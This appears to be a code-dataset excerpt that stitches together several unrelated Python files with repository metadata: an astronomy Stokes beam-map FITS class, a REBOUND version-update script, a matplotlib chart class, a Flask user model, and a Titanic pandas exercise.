T.header.update('HIERARCH SUM BEAMDATA',self['Beamdata'].sum(),'sum of Beamdata')
T.header.update('HIERARCH SUM BEAMDATAQ',self['BeamdataQ'].sum(),'sum of BeamdataQ')
T.header.update('HIERARCH SUM BEAMDATAU',self['BeamdataU'].sum(),'sum of BeamdataU')
T.header.update('HIERARCH SUM BEAMDATAV',self['BeamdataV'].sum(),'sum of BeamdataV')
T.header.update('HIERARCH RIMO',self._nameRIMO if self._nameRIMO != None else '','')
T.header.update('HIERARCH ANGULARCUT',self._angularCut if self._angularCut != None else 'None','angular cut [deg]')
T.header.update('HIERARCH DATE',time.asctime(),'')
T.header.update('HIERARCH CREATOR',creator,'')
T.header.update('HIERARCH CONTACT',Author,'')
if self._Method != None :
for k in self._Method :
T.header.update('HIERARCH '+k[0],k[1],k[2])
T.header.add_comment('')
T.header.add_comment('Beam band averaged')
T.header.add_comment('Follows the list of input files used')
for i in range(len(self.File)) :
l='%s'%(self.File[i])
T.header.add_comment(l)
T.header.add_comment('')
if not doNotWrite :
print " Writing to:",fitsname
T.writeto(fitsname,clobber=clobber)
return T
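# --- Illustrative sketch (added for clarity; not part of the original source) ---
# A plausible band-averaging workflow with this class; the arm code, the
# .lst file name, the flat weighting and the RIMO label are placeholders.
#
# import numpy as np
# cube = stokesCubeMap('x', 'beams_30GHz.lst')
# cube.fill_from_fits()
# freqs = np.linspace(cube.FreqMHz.min(), cube.FreqMHz.max(), 64)
# weights = np.ones(len(freqs))
# avg = cube.average(freqs, weights, nameRIMO='RIMO_placeholder')
# avg.tofits('band_averaged.stokes.fits')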
class stokesMap(MapGrid) :
def __init__(self,StokesFileName,mode='readonly') :
from grid2d import GridAxis
self.__new_info__()
self.__info__['fits_readout_time_sec']=-1.
if StokesFileName==None : return
# connects to the fits file
self.fits_connect(StokesFileName,mode=mode)
# gets the header of the first hdu
self.fits_load_hdu(1,justHeader=True)
# formats the mapgrid according to the header content
self.__info__['geometry']=self.getGeometry()
if self.isGRD() :
MapGrid.__init__(self,GridAxis('y','',self.__info__['geometry']['y']),GridAxis('x','',self.__info__['geometry']['x']))
else :
MapGrid.__init__(self,GridAxis('long','deg',self.__info__['geometry']['long']),GridAxis('colat','deg',self.__info__['geometry']['colat']))
# gets the first hdu
self.fits_load_hdu(1)
def __new_info__(self) :
from collections import OrderedDict
self.__info__=OrderedDict()
def fits_info(self) :
"return infos on the fits file"
if self.__info__['fitsfile']==None :
return "File not connected"
return self.__info__['fitsfile'].info()
def fits_primary_header(self) :
"returns the current fits primary header content"
return self.__info__['header']['p']
def fits_extended_header(self) :
"returns the current fits extended header content"
return self.__info__['header']['x']
def fits_connect(self,FileName,mode='readonly') :
"connect (open and keep control) to a fits file"
import pyfits
self.__info__['StokesFileName']=FileName
self.__info__['fitsfile']=pyfits.open(FileName,mode)
self.__info__['ihdu']=-1
self.__info__['header']={'p':None,'x':None}
if self.__info__['fitsfile']==None :
print "Error: file %s not found"%StokesFileName
MapGrid.__init__(self)
return
self.__info__['header']['p']=self.__info__['fitsfile'][0].header
def fits_unconnect(self) :
"unconnect (close and left control) the fits file"
if self.__info__['fitsfile']==None :
print "File not connected"
self.__info__['fitsfile'].close()
self.__info__['fitsfile']=None
def fits_load_hdu(self,ihdu,justHeader=False) :
"""fits_load_hdu(ihdu)
Load a fits hdu ihdu.
If successful, returns (ihdu, fits_readout_time_sec)"""
from grid2d import GridAxis
import time
self.__info__['fits_readout_time_sec']=-1.
if self.__info__['fitsfile']==None :
print "File not connected"
try :
x=self.__info__['fitsfile'][ihdu].header
except :
print "hdu : ",ihdu," does not exists"
return
self.__info__['header']['x']=x
self.__info__['ihdu']=ihdu
if justHeader : return
tic=time.time()
b=self.__info__['fitsfile'][ihdu].data.field('Beamdata') ; b.shape=(self.R['n'],self.C['n']) ; self.newmap('Beamdata',value=b)
q=self.__info__['fitsfile'][ihdu].data.field('BeamdataQ') ; q.shape=(self.R['n'],self.C['n']) ; self.newmap('BeamdataQ',value=q)
u=self.__info__['fitsfile'][ihdu].data.field('BeamdataU') ; u.shape=(self.R['n'],self.C['n']) ; self.newmap('BeamdataU',value=u)
v=self.__info__['fitsfile'][ihdu].data.field('BeamdataV') ; v.shape=(self.R['n'],self.C['n']) ; self.newmap('BeamdataV',value=v)
self.__info__['fits_readout_time_sec']=time.time()-tic
return self.__info__['ihdu'],self.__info__['fits_readout_time_sec']
def copy(self,skipFields=None,skipFits=True) :
"makes a copy, without fits informations"
import copy
out=stokesMap(None)
for k in self.__dict__.keys() :
if k !='__info__' :
out.__dict__[k]=copy.deepcopy(self.__dict__[k])
else :
out.__new_info__()
for k1 in self.__dict__[k].keys() :
if (k1+' ')[0:4].lower()!='fits' :
out.__dict__[k][k1]=copy.deepcopy(self.__dict__[k][k1])
return out
def fitsType(self) :
if self.__info__['header']['x'].has_key('HIERARCH Nx') :
return 'grd'
else :
return 'cut'
def isGRD(self) :
"Returns True if the file is a GRD"
return self.__info__['header']['x'].has_key('HIERARCH Nx')
def getGeometry(self) :
import numpy as np
geom={}
if self.fitsType()=='grd' :
for k in ['objType','Nx','Ny','Xcentre','Ycentre','Xdelta','Ydelta'] :
geom[k]=self.__info__['header']['x']['HIERARCH '+k]
geom['x']=(np.arange(geom['Nx'])-geom['Xcentre'])*geom['Xdelta']
geom['y']=(np.arange(geom['Ny'])-geom['Ycentre'])*geom['Ydelta']
else :
for k in ['objType','Ntheta','Nphi','Mintheta','Maxtheta'] :
geom[k]=self.__info__['header']['x']['HIERARCH '+k]
geom['colat']=np.rad2deg(np.arange(geom['Ntheta'])*(geom['Maxtheta']-geom['Mintheta'])/float(geom['Ntheta']-1)+geom['Mintheta'])
geom['long']=np.arange(geom['Nphi'])/float(geom['Nphi']-1)*360.
return geom
def coadd(self,that) :
for k in ['Beamdata','BeamdataQ','BeamdataU','BeamdataV'] :
self[k]+=that[k]
def scale(self,that) :
for k in ['Beamdata','BeamdataQ','BeamdataU','BeamdataV'] :
self[k]*=that
def __sub__(self,that) :
new=self.copy()
for k in ['Beamdata','BeamdataQ','BeamdataU','BeamdataV'] :
try :
new[k]-=that[k]
except :
new[k]-=that
return new
def __add__(self,that) :
new=self.copy()
for k in ['Beamdata','BeamdataQ','BeamdataU','BeamdataV'] :
try :
new[k]+=that[k]
except :
new[k]+=that
return new
def __pow__(self,that) :
new=self.copy()
for k in ['Beamdata','BeamdataQ','BeamdataU','BeamdataV'] :
new[k]=new[k]**that
return new
|
gpl-2.0
| -5,566,125,991,815,063,000
| 38.181384
| 147
| 0.569262
| false
| 3.201248
| false
| false
| false
|
hannorein/rebound
|
update_version.py
|
1
|
1912
|
#!/usr/bin/python
# This script updates the version number in README.md, src/rebound.c and setup.py, and injects the current git hash.
import glob
import subprocess
ghash = subprocess.check_output(["git", "rev-parse", "HEAD"]).decode("ascii").strip()
with open("version.txt") as f:
reboundversion = f.readlines()[0].strip()
print("Updating version to "+reboundversion)
with open("README.md") as f:
readme = f.readlines()
keep_lines_after_header = 5
with open("README.md","w") as f:
start_delete = -1
for i in range(0,len(readme)):
# [](https://rebound.readthedocs.org)
if "![Version]" in readme[i]:
readme[i] = "[](https://rebound.readthedocs.org)\n"
f.write(readme[i])
with open("src/rebound.c") as f:
reboundlines = f.readlines()
for i,l in enumerate(reboundlines):
if "**VERSIONLINE**" in l:
reboundlines[i] = "const char* reb_version_str = \""+reboundversion+"\"; // **VERSIONLINE** This line gets updated automatically. Do not edit manually.\n"
with open("src/rebound.c", "w") as f:
f.writelines(reboundlines)
with open("setup.py") as f:
setuplines = f.readlines()
for i,l in enumerate(setuplines):
if "version='" in l:
setuplines[i] = " version='"+reboundversion+"',\n"
if "GITHASHAUTOUPDATE" in l:
setuplines[i] = " ghash_arg = \"-DGITHASH="+ghash+"\" #GITHASHAUTOUPDATE\n"
with open("setup.py", "w") as f:
f.writelines(setuplines)
shortversion = reboundversion
while shortversion[-1] != '.':
shortversion = shortversion[:-1]
shortversion = shortversion[:-1]
print("To commit, copy and paste:")
print("\ngit commit -a -m \"Updating version to "+reboundversion+"\"")
|
gpl-3.0
| 159,939,837,923,048,500
| 36.490196
| 174
| 0.638598
| false
| 3.22973
| false
| false
| false
|
neuRowsATL/animatLabSimulationAPI
|
class_chartViz.py
|
1
|
5103
|
"""
Created by: Bryce Chung
Last modified: January 4, 2016
"""
import matplotlib.pyplot as plt
import numpy as np
plt.ion()
global verbose
verbose = 3
class chartViz(object):
"""
This class is used to visualize chartData objects.
"""
def __init__(self):
self.data = {}
self.fig = None
self.axes = {}
self.arrange = None
self.chartFormat = None
self.title = ''
self.titleFormat = {}
def add_data(self, name, objChartData):
if objChartData not in self.data:
self.data[name] = objChartData.data
def set_arrange(self, arrange):
self.arrange = arrange
def set_format(self, chartFormat):
self.chartFormat = chartFormat
def set_title(self, title, titleFormat = {}):
self.title = title
self.titleFormat = titleFormat
def make_chart(self, hide=['Time']):
self.fig = plt.figure(figsize=(24,18))
self.fig.suptitle(self.title, **self.titleFormat)
axShare = None
if self.arrange is None:
axLen = 1
for dAxis in self.data:
axLen += len(np.where(np.array(self.data[dAxis].keys()) != 'Time')[0])
i=1
for name in self.data:
dAxis = self.data[name]
print "\n"
for d in dAxis.keys():
if d in hide:
continue
if verbose > 1:
print "Charting: %s" % d
print "Shared:"
print axShare
if len(self.axes) > 0:
ax = self.fig.add_subplot(axLen, 1, i, sharex=axShare)
else:
ax = self.fig.add_subplot(axLen, 1, i)
axShare = ax
if dAxis[d].datatype == 'analog':
ax.plot(dAxis['Time'].data, dAxis[d].data, 'b-')
elif dAxis[d].datatype == 'spike':
for spike in dAxis[d].data:
ax.axvline(spike, color='g')
ax.yaxis.set_ticklabels([])
if i < axLen:
ax.xaxis.set_ticklabels([])
self.axes[d] = ax
i += 1
else:
for ix, axis in enumerate(self.arrange):
print "\n"
if len(self.axes) > 0:
ax = self.fig.add_subplot(len(self.arrange), 1, ix+1, sharex=axShare)
print "Sharing axis: %s" % str(axShare)
else:
ax = self.fig.add_subplot(len(self.arrange), 1, ix+1)
print "No shared axis"
axShare = ax
for ix, chart in enumerate(self.arrange[axis]['charts']):
if ''.join(chart.split('.')[1:]) in hide:
continue
if verbose > 1:
print "Charting: %s" % chart
#print "Shared:"
#print axShare
color = 'k'
kwargs = {}
if chart in self.chartFormat.keys():
formatting = self.chartFormat[chart]
if 'color' in formatting.keys():
kwargs['color'] = self.chartFormat[chart]['color']
if verbose > 1:
print "Charting: %s" % chart
print kwargs
strDataObj = chart.split('.')[0]
strChart = ''.join(chart.split('.')[1:])
data = self.data[strDataObj]
if data[strChart]['datatype'] == 'analog':
ax.plot(data['Time']['data'], data[strChart]['data'], **kwargs)
elif data[strChart]['datatype'] == 'spike':
if len(self.arrange[axis]['charts']) > 1:
height = 1./len(self.arrange[axis]['charts'])
else:
height = 1
for spike in data[strChart]['data']:
ax.axvline(spike, ymin=ix*height, ymax=(ix+1)*height-height*0.1, **kwargs)
ax.yaxis.set_ticklabels([])
ax.set_ylabel(self.arrange[axis]['name'])
if ix+1 < len(self.arrange):
ax.xaxis.set_ticklabels([])
self.axes[axis] = ax
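# --- Illustrative sketch (added for clarity; not part of the original source) ---
# A plausible way to drive this class; `myChartData` stands in for a
# chartData object whose .data maps channel names to records.
#
# cv = chartViz()
# cv.add_data('trial1', myChartData)
# cv.set_arrange({0: {'name': 'N3', 'charts': ['trial1.N3']}})
# cv.set_format({'trial1.N3': {'color': 'r'}})
# cv.set_title('Example session')
# cv.make_chart()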
|
gpl-2.0
| 2,067,055,089,075,999,700
| 35.45
| 102
| 0.386047
| false
| 4.836967
| false
| false
| false
|
cloughrm/Flask-Angular-Template
|
backend/pastry/models.py
|
1
|
2070
|
import random
import hashlib
from flask import current_app as app
from pastry.db import mongo
from werkzeug.security import generate_password_hash, check_password_hash
from itsdangerous import TimedJSONWebSignatureSerializer, SignatureExpired, BadSignature
class User(object):
def __init__(self, username, password):
self.set_args(
username=username,
password=generate_password_hash(password)
)
def set_args(self, **kwargs):
self.username = kwargs.get('username')
self.password = kwargs.get('password')
def create(self):
object_id = mongo.db.users.insert({
'username': self.username,
'password': self.password,
'api_key': self.generate_api_key(),
'admin': False,
'groups': ['user'],
'verified': False,
})
return object_id
def exists(self):
user = mongo.db.users.find_one({'username': self.username})
if user:
self.set_args(**user)
return True
return False
def generate_auth_token(self, expires_in=86400):
s = TimedJSONWebSignatureSerializer(app.config.get('SECRET_KEY'), expires_in=expires_in)
token = s.dumps({'username': self.username})
return token
def generate_api_key(self):
return hashlib.md5(str(random.getrandbits(256))).hexdigest()
def verify_password(self, password):
return check_password_hash(self.password, password)
@staticmethod
def verify_api_key(api_key):
return mongo.db.users.find_one({'api_key': api_key})
@staticmethod
def verify_auth_token(token):
s = TimedJSONWebSignatureSerializer(app.config.get('SECRET_KEY'))
try:
data = s.loads(token)
except SignatureExpired:
app.logger.info('Expired Token')
return False
except BadSignature:
app.logger.warning('Invalid Token')
return False
user = mongo.db.users.find_one({'username': data['username']})
return user
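# --- Illustrative sketch (added for clarity; not part of the original source) ---
# Typical lifecycle of this model inside a request handler; the credentials
# are placeholders and a Flask application context is assumed.
#
# user = User('alice', 's3cret')
# if not user.exists():
#     user.create()
# token = user.generate_auth_token(expires_in=3600)
# record = User.verify_auth_token(token)   # user document, or False on failure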
|
mit
| -8,695,304,718,168,323,000
| 30.363636
| 96
| 0.617391
| false
| 4.115308
| false
| false
| false
|
dmitryfizteh/MachineLearning
|
Week_1/Task_1/titanic.py
|
1
|
2465
|
import pandas
from scipy.stats.stats import pearsonr
print("Неделя №1. Задание №1")
# Функция вывода ответа
def write_result(result, index):
print("Ответ: " + str(result))
file = open("./Answers/" + str(index) + ".txt", "w")
file.write(result)
file.close()
data = pandas.read_csv('./Data/titanic.csv', index_col='PassengerId')
print("\nРешение задачи №1")
a1 = data['Sex'].value_counts()
result = str("%d %d" % (a1['male'],a1['female']))
write_result(result, 1)
print("\nРешение задачи №2")
a2 = data['Survived'].value_counts()
#print("%d погибло, %d выжило" % (a2[0],a2[1]))
result = str("%.2f" % (round(a2[1]/(a2[0]+a2[1])*100,2)))
write_result(result, 2)
print("\nРешение задачи №3")
a3 = data['Pclass'].value_counts()
result = str("%.2f" % (round(a3[1]/(a3[1]+a3[2]+a3[3])*100,2)))
write_result(result, 3)
print("\nРешение задачи №4")
a4_1 = (data['Age'].dropna()).mean()
a4_2 = (data['Age'].dropna()).median()
result = str("%0.2f %0.2f" % (a4_1, a4_2))
write_result(result, 4)
print("\nРешение задачи №5")
a5 = pearsonr(data['SibSp'], data['Parch'])
#print('Коэффициент корреляции r= %0.2f, уровень значимости p = %0.3f.' % a5)
result = str("%0.2f" % a5[0])
write_result(result, 5)
print("\nРешение задачи №6")
a6 = data[data['Sex'] == "female"]
a6 = a6['Name']
names = list()
for (key,value) in enumerate(a6):
value = value.replace("Mrs. ","")
value = value.replace("Miss. ","")
value = value.replace("(","")
value = value.replace(")","")
value = value.replace('"','')
value = value.split(", ")
names_i = value[0]
names.append(value[0])
for name in value[1].split(" "):
names.append(name)
# Find the most frequent element in an array
def Freq2(b):
d = {}
m, i = 0, 0 # Highest frequency seen so far and its key
for x in b: # Walk over the source array
d[x] = d[x] + 1 if x in d else 1 # Increment the count if the key exists, otherwise start at 1
if d[x] > m:
m, i = d[x], x # Remember the new maximum and its key
#return {i:m}
return i
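# Worked example (added for clarity): Freq2(["Anna", "Maria", "Anna"])
# returns "Anna", the most frequent element.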
result = str("%s" % (Freq2(names)))
write_result(result, 6)
|
gpl-3.0
| -2,582,688,218,459,481,000
| 26.376623
| 95
| 0.610057
| false
| 1.918107
| false
| false
| false
|